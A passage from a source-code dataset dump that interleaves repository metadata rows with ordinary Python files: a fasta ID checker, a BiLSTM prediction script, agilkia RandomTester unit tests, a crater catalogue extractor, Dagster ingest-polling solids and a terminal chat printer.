] | 1 | 2020-03-07T07:15:51.000Z | 2020-03-07T07:15:51.000Z |
import rob
import sys
# Compare the sequence IDs of a fasta file against the IDs listed in
# analyzed_sequences.txt and annotations.txt (both read from the current
# directory), reporting mismatches in both directions on stderr.
faf = None
try:
    faf = sys.argv[1]
except IndexError:
    sys.stderr.write("Please provide a fasta file\n")
    # Bug fix: a missing argument is an error, so exit non-zero
    # (the original called sys.exit(0)).
    sys.exit(1)

fa = rob.readFasta(faf)

# use sets for O(1) membership instead of repeated list scans
analyzed = set()
with open('analyzed_sequences.txt', 'r') as asf:
    for line in asf:
        seqid = line.rstrip()
        analyzed.add(seqid)
        if seqid not in fa:
            sys.stderr.write(seqid + " has been analyzed but is not in " + faf + "\n")
for f in fa:
    if f not in analyzed:
        sys.stderr.write("NOT ANALYZED: " + f + "\n")

annotated = set()
with open('annotations.txt', 'r') as asf:
    for line in asf:
        # first tab-separated column is the sequence id
        seqid = line.split("\t")[0]
        annotated.add(seqid)
        if seqid not in fa:
            sys.stderr.write(seqid + " has been annotated but is not in " + faf + "\n")
for f in fa:
    if f not in annotated:
        sys.stderr.write("NOT ANNOTATED: " + f + "\n")
| 20.468085 | 91 | 0.60395 | 145 | 962 | 3.993103 | 0.331034 | 0.051813 | 0.120898 | 0.031088 | 0.303972 | 0.303972 | 0.303972 | 0.210708 | 0.210708 | 0.210708 | 0 | 0.021127 | 0.261954 | 962 | 46 | 92 | 20.913043 | 0.794366 | 0.059252 | 0 | 0.137931 | 0 | 0 | 0.193764 | 0.024499 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.068966 | 0 | 0.068966 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
d9102c896bee462a9b81d732607e83c597abdf5a | 1,403 | py | Python | examples/lstm/elmo_embeddings/torchtext/predict.py | yngtodd/scene | 99355c05b1668586fa09ac70b39c258b39e73c72 | [
"MIT"
] | 2 | 2019-04-18T18:06:41.000Z | 2021-03-09T02:05:34.000Z | examples/lstm/elmo_embeddings/torchtext/predict.py | yngtodd/scene | 99355c05b1668586fa09ac70b39c258b39e73c72 | [
"MIT"
] | null | null | null | examples/lstm/elmo_embeddings/torchtext/predict.py | yngtodd/scene | 99355c05b1668586fa09ac70b39c258b39e73c72 | [
"MIT"
] | null | null | null | import os
import tqdm
import torch
import numpy as np
from parser import parse_args
from scene.data import DataSet
from torchtext.data import Iterator
from scene.data.loaders import BatchWrapper
from scene.models import BiLSTM
def predict(model, loader):
    """Run *model* over every batch of *loader* and return predicted classes.

    Parameters
    ----------
    model : torch.nn.Module
        Trained classifier; ``model(data)`` must return per-class scores.
    loader : iterable
        Yields batches in whatever form the model accepts.

    Returns
    -------
    numpy.ndarray
        One entry per batch holding the argmax class indices.
    """
    model.eval()
    predictions = []
    # inference only: disable autograd to save memory and time
    with torch.no_grad():
        for data in tqdm.tqdm(loader):
            pred = model(data)
            _, pred = torch.max(pred.data, 1)
            predictions.append(pred)
    return np.array(predictions)
def main():
    """Load the test split, restore a trained BiLSTM, and save predictions."""
    args = parse_args()
    torch.manual_seed(args.seed)
    use_cuda = not args.no_cuda and torch.cuda.is_available()
    device = torch.device("cuda" if use_cuda else "cpu")

    data = DataSet(args.datapath)
    train_data, val_data, test_data = data.load_splits()
    vocab = data.textfield.vocab

    test_iter = Iterator(
        test_data,
        batch_size=1,
        device=device,
        sort=False,
        sort_within_batch=False,
        repeat=False
    )
    testloader = BatchWrapper(test_iter)

    savepath = os.path.join(args.savepath, 'bilstm_small_val.pth')
    savepoint = torch.load(savepath)

    model = BiLSTM(num_vocab=len(vocab), n_classes=10).to(device)
    model.load_state_dict(savepoint['model_state_dict'])

    # Bug fix: the original passed the raw ``test_iter`` to predict() and
    # left ``testloader`` (the BatchWrapper) entirely unused.
    predictions = predict(model, testloader)

    outpath = os.path.join(args.savepath, 'test_preds.npy')
    np.save(outpath, predictions)
if __name__=='__main__':
main() | 24.189655 | 66 | 0.685674 | 189 | 1,403 | 4.899471 | 0.439153 | 0.029158 | 0.028078 | 0.030238 | 0.047516 | 0 | 0 | 0 | 0 | 0 | 0 | 0.003613 | 0.210976 | 1,403 | 58 | 67 | 24.189655 | 0.832882 | 0 | 0 | 0 | 0 | 0 | 0.046296 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.046512 | false | 0 | 0.209302 | 0 | 0.27907 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
d9130637f37aa67dccc5076d10b6043a6f6dd312 | 9,926 | py | Python | test/test_random_tester.py | shanefeng123/agilkia | 0ac4e9dd29f9ab0026037f71d7f28d017e54949b | [
"MIT"
] | 3 | 2020-02-11T14:22:51.000Z | 2020-11-26T19:09:03.000Z | test/test_random_tester.py | shanefeng123/agilkia | 0ac4e9dd29f9ab0026037f71d7f28d017e54949b | [
"MIT"
] | 1 | 2019-11-22T02:06:47.000Z | 2021-05-10T07:22:26.000Z | test/test_random_tester.py | shanefeng123/agilkia | 0ac4e9dd29f9ab0026037f71d7f28d017e54949b | [
"MIT"
] | 4 | 2019-12-12T10:44:07.000Z | 2022-03-10T14:09:27.000Z | # -*- coding: utf-8 -*-
"""
Unit tests for the RandomTester class.
@author: m.utting@uq.edu.au
"""
import unittest
import random
from pathlib import Path
import sklearn.utils.estimator_checks
from typing import Tuple, List, Set, Dict, Optional, Any
import agilkia
# Directory containing this test file (used to locate fixtures).
THIS_DIR = Path(__file__).parent

# Public SOAP demo service used as a simple test target.
WSDL_EG = "http://www.soapclient.com/xml/soapresponder.wsdl"

# Input-generation rules: each key maps a parameter name to the pool of
# values the RandomTester may draw from (password is "good" 9 times in 10).
test_input_rules = {
    "username": ["User1"],
    "password": ["<GOOD_PASSWORD>"] * 9 + ["bad-pass"],
    "speed": [str(s) for s in range(0, 120, 10)],
    "bstrParam1": ["VAL1"],
    "bstrParam2": ["p2AAA", "p2BBB"],
}
class TestReadInputRules(unittest.TestCase):
    """Checks that input rules load correctly from a fixture CSV file."""

    def test_1(self):
        fixture = THIS_DIR / "fixtures/inputs1.csv"
        loaded = agilkia.read_input_rules(fixture)
        self.assertEqual(["one"], loaded["bstrParam1"])
        self.assertEqual(["two", "two", "two", "TWO!"], loaded["bstrParam2"])
class TestRandomTester(unittest.TestCase):
    """Tests for agilkia.RandomTester against the soapresponder demo service.

    NOTE(review): these tests construct a RandomTester on the live WSDL at
    ``WSDL_EG``, so they appear to require network access -- confirm before
    running in CI.
    """

    def setUp(self):
        # Fixed seed so value choices are deterministic across runs.
        self.tester = agilkia.RandomTester(
            WSDL_EG,
            input_rules=test_input_rules,
            rand=random.Random(1234))

    def test_input_user(self):
        """A single-valued rule always yields that value."""
        self.assertEqual("User1", self.tester.choose_input_value("username"))

    def test_input_password(self):
        """The '<GOOD_PASSWORD>' placeholder resolves to agilkia's good password."""
        self.assertEqual(agilkia.GOOD_PASSWORD, self.tester.choose_input_value("password"))

    def test_input_speeds(self):
        """100 random draws cover all 12 configured speed values."""
        speeds = set()
        for i in range(100):
            speeds.add(self.tester.choose_input_value("speed"))
        self.assertEqual(12, len(speeds))  # all results should be covered

    def test_signature(self):
        """get_methods() exposes Method1 with its two string input parameters."""
        sig = self.tester.get_methods()
        self.assertEqual(1, len(sig))
        self.assertEqual({"Method1"}, sig.keys())
        msig = sig["Method1"]
        self.assertEqual(1, len(msig))
        self.assertEqual({"input"}, msig.keys())
        self.assertEqual({"bstrParam1", "bstrParam2"}, msig["input"].keys())
        param1_details = "{'optional': False, 'type': 'String(value)'}"
        self.assertEqual(param1_details, str(msig["input"]["bstrParam1"]))

    def test_dummy_client_meta(self):
        """Test the dummy web service provided by soapresponder."""
        tester = agilkia.RandomTester(WSDL_EG,
                                      input_rules=test_input_rules,
                                      rand=random.Random(1234))
        # every standard metadata key must be present in the trace set
        meta_keys = ["date", "author", "dataset", "source",
                     "web_services", "methods_to_test", "input_rules",
                     "method_signatures"]
        mdata = tester.trace_set.meta_data
        for k in meta_keys:
            self.assertTrue(k in mdata, msg=k + " expected in meta_data")
        self.assertEqual(f"RandomTester", mdata["source"])
        self.assertEqual([WSDL_EG], mdata["web_services"])
        # check the signature
        self.assertEqual(set(["Method1"]), set(mdata["method_signatures"].keys()))
        sig = {'input': {
            'bstrParam1': {'optional': False, 'type': 'String(value)'},
            'bstrParam2': {'optional': False, 'type': 'String(value)'}}}
        self.assertEqual(sig, mdata["method_signatures"]["Method1"])

    def test_dummy_client0(self):
        """Test the dummy web service provided by soapresponder."""
        tester = agilkia.RandomTester(WSDL_EG, verbose=True,
                                      input_rules=test_input_rules,
                                      rand=random.Random(1234))
        print("Methods:", tester.get_methods())
        # with seed 1234 the first three calls draw p2AAA, the fourth p2BBB
        out1 = tester.call_method("Method1")
        expect = {"Status": 0, "value": "Your input parameters are VAL1 and p2AAA"}
        self.assertEqual(expect, out1.outputs)
        out1 = tester.call_method("Method1")
        self.assertEqual(expect, out1.outputs)
        out1 = tester.call_method("Method1")
        self.assertEqual(expect, out1.outputs)
        out1 = tester.call_method("Method1")
        expect["value"] = "Your input parameters are VAL1 and p2BBB"
        self.assertEqual(expect, out1.outputs)
        self.assertEqual(4, len(tester.curr_events))
        self.assertEqual(1, len(tester.trace_set.traces))
        # now generate a second trace
        tester.generate_trace(start=True, length=3)
        self.assertEqual(3, len(tester.curr_events))
        self.assertEqual(2, len(tester.trace_set.traces))
        # now test saving and loading those traces.
        traceset1 = tester.trace_set
        tmp_json = Path("tmp_dummy1.json")
        traceset1.save_to_json(tmp_json)
        traceset2 = agilkia.TraceSet.load_from_json(tmp_json)
        self.assertEqual(traceset2.meta_data, traceset1.meta_data)
        self.assertEqual(len(traceset2.traces), len(traceset1.traces))
        self.assertEqual(traceset2.traces[0].events[0].action,
                         traceset1.traces[0].events[0].action)
        tmp_json.unlink()

    def test_generate_trace(self):
        """A generated trace is a Trace with the default length of 20 events."""
        tr = self.tester.generate_trace()
        self.assertTrue(isinstance(tr, agilkia.Trace))
        self.assertEqual(20, len(tr.events))

    def test_decode_outputs(self):
        """decode_outputs wraps plain values and dicts with a Status field."""
        self.assertEqual({'Status': 0, "value": "abc"}, self.tester.decode_outputs("abc"))
        self.assertEqual({'Status': 0, "a": 2}, self.tester.decode_outputs({"a": 2}))
        # Also, zeep XML object outputs are tested in test_dummy_client0 above.
class TestTracePrefixExtractor(unittest.TestCase):
    """Tests for agilkia.TracePrefixExtractor (bag-of-words prefix encoding)."""

    # Shared fixture events reused by every test in this class.
    ev1 = agilkia.Event("Order", {"Name": "Mark"}, {"Status": 0})
    ev2 = agilkia.Event("Skip", {"Size": 3}, {"Status": 1, "Error": "Too big"})
    ev3 = agilkia.Event("Pay", {"Name": "Mark", "Amount": 23.45}, {"Status": 0})

    def test_bag_of_words(self):
        """Default encoding: one column per action name, counts per prefix."""
        tr1 = agilkia.Trace([self.ev1, self.ev2])
        tr2 = agilkia.Trace([self.ev3])
        traces = agilkia.TraceSet([tr1, tr1, tr2])
        self.assertEqual(3, len(traces))
        sut = agilkia.TracePrefixExtractor()
        sut.fit(traces)
        self.assertEqual(["Order", "Pay", "Skip"], sut.get_feature_names())
        X = sut.transform(traces)
        y = sut.get_labels()
        self.assertEqual((8, 3), X.shape)
        self.assertEqual(8, len(y))
        # rows 0/3/6 are the empty prefixes at the start of each trace
        for row in [0, 3, 6]:
            self.assertEqual([0.0, 0.0, 0.0], X.iloc[row, :].tolist())
            self.assertEqual("Order" if row < 6 else "Pay", y[row])
        # rows 2/5 are the full-trace prefixes of the two tr1 copies
        for row in [2, 5]:
            self.assertEqual([1.0, 0.0, 1.0], X.iloc[row, :].tolist())
            self.assertEqual(agilkia.TRACE_END, y[row])
        self.assertEqual([0.0, 1.0, 0.0], X.iloc[7, :].tolist())

    def test_bag_of_words_custom(self):
        """Test TracePrefixExtractor with a custom event-to-string function."""
        # events are keyed by their 'Name' input, '???' when absent
        def custom(ev): return ev.inputs.get("Name", "???")
        tr1 = agilkia.Trace([self.ev1, self.ev2])
        tr2 = agilkia.Trace([self.ev3, self.ev3])
        traces = agilkia.TraceSet([tr1, tr1, tr2])
        self.assertEqual(3, len(traces))
        self.assertEqual("Mark", custom(self.ev1))
        self.assertEqual("???", custom(self.ev2))
        sut = agilkia.TracePrefixExtractor(custom)
        sut.fit(traces)
        self.assertEqual(["???", "Mark"], sut.get_feature_names())
        X = sut.transform(traces)
        y = sut.get_labels()
        self.assertEqual((9, 2), X.shape)
        self.assertEqual(9, len(y))
        # rows 0/3/6 are the empty prefixes at the start of each trace
        for row in [0, 3, 6]:
            self.assertEqual([0.0, 0.0], X.iloc[row, :].tolist())
            self.assertEqual(custom(traces[row // 3][0]), y[row])
        for row in [2, 5]:
            self.assertEqual([1.0, 1.0], X.iloc[row, :].tolist())
            self.assertEqual(agilkia.TRACE_END, y[row])
        self.assertEqual([0.0, 2.0], X.iloc[8, :].tolist())

    def test_custom_subclass(self):
        """Test TracePrefixExtractor subclass with a custom encoder that::
            - counts Order events
            - sums all 'Size' inputs
            - reports the current action (0=Order, 1=Skip, 2=Pay)
            - and learns status output values.
        """
        action2num = {"Order": 0, "Skip": 1, "Pay": 2}

        class MyPrefixExtractor(agilkia.TracePrefixExtractor):
            def generate_feature_names(self, trace: agilkia.Trace) -> Set[str]:
                return {"Orders", "TotalSize", "CurrAction"}

            def generate_prefix_features(self, events: List[agilkia.Event],
                                         current: Optional[agilkia.Event]) -> Tuple[Dict[str, float], Any]:
                total = sum([ev.inputs.get("Size", 0) for ev in events])
                orders = len([ev.action for ev in events if ev.action == "Order"])
                if current is not None:
                    action = action2num[current.action]
                    learn = current.status
                else:
                    # end-of-trace prefix: sentinel action and label
                    action = -1
                    learn = -1
                return {"Orders": orders, "TotalSize": total, "CurrAction": action}, learn

        tr1 = agilkia.Trace([self.ev1, self.ev2, self.ev2, self.ev1])
        tr2 = agilkia.Trace([self.ev3, self.ev3])
        traces = agilkia.TraceSet([tr1, tr2])
        # now run the encoder
        sut = MyPrefixExtractor()
        sut.fit(traces)
        self.assertEqual(["CurrAction", "Orders", "TotalSize"], sut.get_feature_names())
        X = sut.transform(traces)
        y = sut.get_labels()
        self.assertEqual((8, 3), X.shape)
        self.assertEqual(8, len(y))
        # tr1 prefixes
        self.assertEqual([0, 0, 0], X.iloc[0, :].tolist())
        self.assertEqual([1, 1, 0], X.iloc[1, :].tolist())
        self.assertEqual([1, 1, 3], X.iloc[2, :].tolist())
        self.assertEqual([0, 1, 6], X.iloc[3, :].tolist())
        self.assertEqual([-1, 2, 6], X.iloc[4, :].tolist())
        self.assertEqual([0, 1, 1, 0, -1], y[0:5])
        # tr2 prefixes
        self.assertEqual([2, 0, 0], X.iloc[5, :].tolist())
        self.assertEqual([2, 0, 0], X.iloc[6, :].tolist())
        self.assertEqual([-1, 0, 0], X.iloc[7, :].tolist())
        self.assertEqual([0, 0, -1], y[5:])
| 42.969697 | 107 | 0.590872 | 1,209 | 9,926 | 4.754342 | 0.210918 | 0.161795 | 0.043841 | 0.008525 | 0.383612 | 0.306193 | 0.27366 | 0.23382 | 0.23382 | 0.226166 | 0 | 0.033086 | 0.253979 | 9,926 | 230 | 108 | 43.156522 | 0.743147 | 0.070623 | 0 | 0.22905 | 0 | 0 | 0.103501 | 0 | 0 | 0 | 0 | 0 | 0.357542 | 1 | 0.089385 | false | 0.01676 | 0.03352 | 0.011173 | 0.173184 | 0.005587 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
d914350d04727b2996e71856ecd3f13d1e827077 | 2,576 | py | Python | cratertools/utils/salamuniccar.py | utplanets/cratertools | 3cd303f5e598d9945e186924b3e25af1457d3749 | [
"MIT"
] | null | null | null | cratertools/utils/salamuniccar.py | utplanets/cratertools | 3cd303f5e598d9945e186924b3e25af1457d3749 | [
"MIT"
] | null | null | null | cratertools/utils/salamuniccar.py | utplanets/cratertools | 3cd303f5e598d9945e186924b3e25af1457d3749 | [
"MIT"
] | null | null | null | # extract the Salamunnicar data from the XLS file
import pandas as pd
import pkg_resources
import logging
import os
def extract_salamuniccar(filename, tables=None,
                         output_prefix=None,
                         output_filename=None):
    """Extract the lat, long, diameter columns from the Salamuniccar catalogs.

    Parameters
    ----------
    filename : str
        Path to the Salamuniccar Excel workbook.
    tables : str or list of str, optional
        Sheet name(s) to process; defaults to every sheet except
        "YourCatalogue" and "Macros".
    output_prefix : str, optional
        Prefix for the per-sheet raw HDF dumps (default "GS_").
    output_filename : str, optional
        If given, the renamed/cleaned columns are also appended to this HDF file.
    """
    logger = logging.getLogger(__name__)
    logging.basicConfig(level=logging.INFO)
    logger.info("Reading Excel file")
    logger.info(output_filename)
    dfe = pd.ExcelFile(filename)
    names = [x for x in dfe.sheet_names if
             x != "YourCatalogue" and x != "Macros"]
    tables = tables or names
    if isinstance(tables, str):
        tables = [tables]
    output_prefix = output_prefix or "GS_"
    # column-name mapping shipped with the package (index = catalog name)
    mapping_name = pkg_resources.resource_filename('cratertools',
                                                   'data/salamuniccar_mapping.csv',)
    mapping = pd.read_csv(mapping_name, index_col=0)
    for name in tables:
        logger.info("Processing table : {}".format(name))
        df = pd.read_excel(filename, name)
        outname = output_prefix + name
        df.to_hdf(outname, "/" + name)
        if output_filename is None:
            continue
        # was a bare debug print(name, mapping.index)
        logger.debug("table %s; known mappings: %s", name, mapping.index)
        if name in mapping.index:
            d = mapping[mapping.index == name]
            v, k = d.columns.values, d.values[0]
            df = df.loc[:, k]
            df.rename(columns=dict(zip(k, v)),
                      inplace=True)
            # warp the longitude into [-180, 180]
            # Bug fix: the original chained assignment
            # ``df["Long"][df["Long"] > 180] -= 360`` can silently modify a
            # copy; .loc guarantees the frame itself is updated.
            df.loc[df["Long"] > 180, "Long"] -= 360
            df = df.dropna()
            df.to_hdf(output_filename, name,
                      append=os.path.exists(output_filename), complevel=5)
def extract_robbins(filename, output_filename=None):
    """Extract the lat,long, diameter from the robbins catalog."""
    logger = logging.getLogger(__name__)
    logging.basicConfig(level=logging.INFO)
    logger.info("Reading Robbins data")

    # tab-separated source catalog
    robbins = pd.read_table(filename, engine="python", delimiter="\t")

    # packaged column-name mapping; the "Robbins" row tells us which source
    # columns to keep (values) and what to rename them to (column headers)
    mapping_name = pkg_resources.resource_filename('cratertools',
                                                   'data/salamuniccar_mapping.csv',)
    mapping = pd.read_csv(mapping_name, index_col=0)
    row = mapping[mapping.index == "Robbins"]
    new_cols = row.columns.values
    old_cols = row.values[0]

    robbins = robbins[old_cols]
    robbins.rename(columns=dict(zip(old_cols, new_cols)), inplace=True)

    if output_filename is not None:
        # append when the target file already exists
        robbins.to_hdf(output_filename, "/Robbins",
                       append=os.path.exists(output_filename), index=False)
| 36.8 | 84 | 0.610637 | 308 | 2,576 | 4.961039 | 0.311688 | 0.082461 | 0.02356 | 0.032723 | 0.429319 | 0.429319 | 0.387435 | 0.387435 | 0.312827 | 0.312827 | 0 | 0.005933 | 0.28028 | 2,576 | 69 | 85 | 37.333333 | 0.818231 | 0.072593 | 0 | 0.222222 | 0 | 0 | 0.081195 | 0.024401 | 0 | 0 | 0 | 0 | 0 | 1 | 0.037037 | false | 0 | 0.074074 | 0 | 0.111111 | 0.018519 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
d9175c1d53f0050bb3c406ad6da397071f06e203 | 3,558 | py | Python | orchestration/hca_orchestration/solids/load_hca/poll_ingest_job.py | DataBiosphere/hca-ingest | 1f5e8ad7450ff8caff3bb8c8d6b8f7acd8a37f68 | [
"BSD-3-Clause"
] | 5 | 2020-05-07T14:18:53.000Z | 2021-03-31T21:30:37.000Z | orchestration/hca_orchestration/solids/load_hca/poll_ingest_job.py | DataBiosphere/hca-ingest | 1f5e8ad7450ff8caff3bb8c8d6b8f7acd8a37f68 | [
"BSD-3-Clause"
] | 232 | 2020-05-28T16:47:22.000Z | 2022-03-08T21:08:42.000Z | orchestration/hca_orchestration/solids/load_hca/poll_ingest_job.py | DataBiosphere/hca-ingest | 1f5e8ad7450ff8caff3bb8c8d6b8f7acd8a37f68 | [
"BSD-3-Clause"
] | 1 | 2020-08-19T16:33:54.000Z | 2020-08-19T16:33:54.000Z | from typing import Optional
from dagster import solid, Int, Failure, Nothing, configured, String, DagsterLogManager
from dagster.core.execution.context.compute import AbstractComputeExecutionContext
from dagster_utils.typing import DagsterConfigDict
from data_repo_client import JobModel, ApiException, RepositoryApi
from hca_manage.common import JobId
from hca_orchestration.contrib.retry import is_truthy, retry
class DataFileIngestionFailure(Failure):
    """Raised when a TDR bulk file-load job reports one or more failed files."""
    pass
@solid(
    required_resource_keys={"data_repo_client"},
    config_schema={
        'max_wait_time_seconds': Int,
        'poll_interval_seconds': Int,
    }
)
def base_check_data_ingest_job_result(context: AbstractComputeExecutionContext, job_id: JobId) -> JobId:
    """Poll the TDR bulk file-load job and fail if any file failed to load."""
    cfg = context.solid_config
    outcome = _base_check_jade_job_result(
        cfg['max_wait_time_seconds'],
        cfg['poll_interval_seconds'],
        job_id,
        context.resources.data_repo_client,
        context.log
    )
    if outcome['failedFiles'] > 0:
        raise DataFileIngestionFailure(
            f"Bulk file load (job_id = {job_id} had failedFiles = {outcome['failedFiles']})")
    return job_id
@configured(base_check_data_ingest_job_result)
def check_data_ingest_job_result(config: DagsterConfigDict) -> DagsterConfigDict:
    """
    Polls the bulk file ingest results
    Any files failed will fail the pipeline
    """
    eight_hours = 8 * 60 * 60  # 28800 seconds
    return {
        'max_wait_time_seconds': eight_hours,
        'poll_interval_seconds': 5
    }
@solid(
    required_resource_keys={"data_repo_client"},
    config_schema={
        'max_wait_time_seconds': Int,
        'poll_interval_seconds': Int,
    }
)
def check_table_ingest_result(context: AbstractComputeExecutionContext, job_id: JobId) -> JobId:
    """Poll a TDR table (metadata) ingest job and fail if any rows were bad.

    Raises Failure when the job reports a non-zero ``bad_row_count``.
    """
    job_results = _base_check_jade_job_result(
        context.solid_config['max_wait_time_seconds'],
        context.solid_config['poll_interval_seconds'],
        job_id,
        context.resources.data_repo_client,
        context.log
    )
    # Bug fix: the original raised when bad_row_count == '0' (i.e. on
    # success), and its message reported the file-load key 'failedFiles',
    # which is not part of a table-ingest result.
    if job_results['bad_row_count'] != '0':
        raise Failure(
            f"Table ingest (job_id = {job_id}) had bad_row_count = {job_results['bad_row_count']}")
    return job_id
@configured(check_table_ingest_result)
def check_table_ingest_job_result(config: DagsterConfigDict) -> DagsterConfigDict:
    """
    Polls the bulk file ingest results
    Any files failed will fail the pipeline
    """
    ten_minutes = 10 * 60  # 600 seconds
    return {
        'max_wait_time_seconds': ten_minutes,
        'poll_interval_seconds': 5,
    }
def _base_check_jade_job_result(
        max_wait_time_seconds: int,
        poll_interval_seconds: int,
        job_id: JobId,
        data_repo_client: RepositoryApi,
        logger: DagsterLogManager
) -> JobModel:
    """Poll TDR for the result of *job_id*, retrying transient 5xx errors.

    Returns the job result once available; raises Failure if nothing was
    obtained within ``max_wait_time_seconds``.

    (Bug fix: the return annotation was ``Nothing`` even though the
    function returns the fetched job result.)
    """
    # we need to poll on the endpoint as a workaround for a race condition in TDR (DR-1791)
    def __fetch_job_results(jid: JobId) -> Optional[JobModel]:
        try:
            logger.info(f"Fetching job results for job_id = {jid}")
            return data_repo_client.retrieve_job_result(jid)
        except ApiException as ae:
            # 5xx responses are transient -> signal "retry" by returning None;
            # any other API error propagates immediately
            if 500 <= ae.status <= 599:
                logger.info(f"Data repo returned error when fetching results for job_id = {jid}, scheduling retry")
                return None
            raise

    job_results = retry(
        __fetch_job_results,
        max_wait_time_seconds,
        poll_interval_seconds,
        is_truthy,
        job_id
    )
    if not job_results:
        raise Failure(f"No job results after polling bulk ingest, job_id = {job_id}")
    return job_results
| 31.767857 | 115 | 0.697021 | 437 | 3,558 | 5.343249 | 0.283753 | 0.034261 | 0.037687 | 0.06167 | 0.529336 | 0.500642 | 0.479229 | 0.479229 | 0.479229 | 0.460814 | 0 | 0.009045 | 0.223159 | 3,558 | 111 | 116 | 32.054054 | 0.835745 | 0.071669 | 0 | 0.309524 | 0 | 0 | 0.199877 | 0.095034 | 0 | 0 | 0 | 0 | 0 | 1 | 0.071429 | false | 0.011905 | 0.083333 | 0 | 0.25 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
d918edc1790e02527055eb43540fcf3985679871 | 10,533 | py | Python | print_chat.py | IVIGOR13/print_chat | 629bc9419f13d05e13e0224000bf8bf12058e605 | [
"MIT"
] | 1 | 2020-04-07T07:44:37.000Z | 2020-04-07T07:44:37.000Z | print_chat.py | IVIGOR13/print_chat | 629bc9419f13d05e13e0224000bf8bf12058e605 | [
"MIT"
] | null | null | null | print_chat.py | IVIGOR13/print_chat | 629bc9419f13d05e13e0224000bf8bf12058e605 | [
"MIT"
] | null | null | null | #
# Author: Igor Ivanov
# 2019
#
import time
import os
from termcolor import colored
from datetime import datetime
import colorama
colorama.init()
"""
Small print tool for implementing chat in the terminal
"""
class print_chat:
    """Render a scrolling chat log in the terminal using ANSI escapes.

    Messages live in ``self.MESSAGES`` as dicts with keys ``sender``,
    ``text``, ``time``, ``skip`` (extra lines printed below the message) and
    ``mark`` (annotation strings appended after the text).  Message numbers
    count from the bottom of the log: number 1 is the newest message.
    """

    def _clear_screen(self):
        # 'cls' on Windows, 'clear' elsewhere
        os.system('cls' if os.name == 'nt' else 'clear')

    def clear_row(self):
        """Blank the current row and leave the cursor at column 0."""
        print('\r' + ' ' * os.get_terminal_size().columns + '\r', end='')

    def up_on_rows(self, number):
        """Move the cursor up ``number`` rows, blanking each row passed.

        Bug fix: the original wrote ``self.clear_row`` without parentheses,
        a no-op attribute access, so the current row was never cleared.
        """
        self.clear_row()
        print(('\x1b[A\r' + ' ' * os.get_terminal_size().columns + '\r') * number, end='')

    def up_on_message(self, number):
        """Move the cursor up to the start of message ``number``."""
        n = self.__get_lines(number)
        self.up_on_rows(n)

    def up_on_occupied_rows(self, len_str):
        """Move up over a wrapped string of ``len_str`` characters."""
        lines = ((len_str - 1) // os.get_terminal_size().columns) + 1
        self.up_on_rows(lines)

    def down_on_rows(self, number):
        """Move the cursor down ``number`` rows, blanking each row passed."""
        self.clear_row()
        print(('\n\r' + ' ' * os.get_terminal_size().columns + '\r') * number, end='')

    def get_num_messages(self):
        """Return the number of stored messages."""
        return len(self.MESSAGES)

    def get_messages_from(self, sender):
        """Return all messages sent by ``sender``.

        Bug fix: the original initialised ``out = ()`` (a tuple) and then
        called ``out.append``, which raised AttributeError.
        """
        return [m for m in self.MESSAGES if m['sender'] == sender]

    def get_messages(self):
        """Return the full message list."""
        return self.MESSAGES

    def get_message(self, number):
        """Return message ``number`` (1 = newest); None if out of range."""
        if number <= len(self.MESSAGES):
            return self.MESSAGES[len(self.MESSAGES) - number]

    def get_senders(self):
        """Return the names of all known senders.

        Bug fix: ``self.senders`` is a list of dicts, but the original
        iterated ``self.senders.keys()`` and appended into a tuple -- both
        operations raised at runtime.
        """
        return [entry['sender'] for entry in self.senders]

    def set_colors(self, colors):
        """Assign display colors: ``colors`` is a list of (sender[, color]).

        Unknown senders are added; a missing color defaults to 'grey'.
        Bug fix: the ``found`` flag is now reset for every entry --
        previously one match suppressed the creation of all later senders.
        """
        for color in colors:
            found = False
            for entry in self.senders:
                if entry['sender'] == color[0]:
                    entry['color'] = color[1]
                    found = True
            if not found:
                self.senders.append({
                    'sender': color[0],
                    'color': 'grey' if len(color) == 1 else color[1],
                })

    def get_time(self):
        """Current timestamp, short (HH:MM) or full, per ``time_full``."""
        if not self.time_full:
            return datetime.today().strftime("%H:%M")
        else:
            return datetime.today().strftime("%d.%m.%y %H:%M")

    def set_header(self, text):
        """Set the header shown above the chat (may contain newlines)."""
        self.header = text.split('\n')
        self._print_header()

    def _print_header(self):
        # redraw the header onto a freshly cleared screen
        self._clear_screen()
        for line in self.header:
            print(line)

    # returns the number of terminal lines that must be passed to move the
    # cursor to the start of the specified message
    def __get_lines(self, number):
        lines = 0
        for i in range(number):
            # counting the number of lines occupied by a message;
            # marks are printed joined, so count their total character
            # length (bug fix: the original used len(m['mark']), the number
            # of marks, not their printed width)
            m = self.MESSAGES[(len(self.MESSAGES) - 1) - i]
            l = (len(m['sender']) + len(m['text'])
                 + len(''.join(m['mark'])) + self.len_frame)
            # count the number of lines occupied by the skip entries
            s = 0
            for entry in m['skip']:
                for part in str(entry).split('\n'):
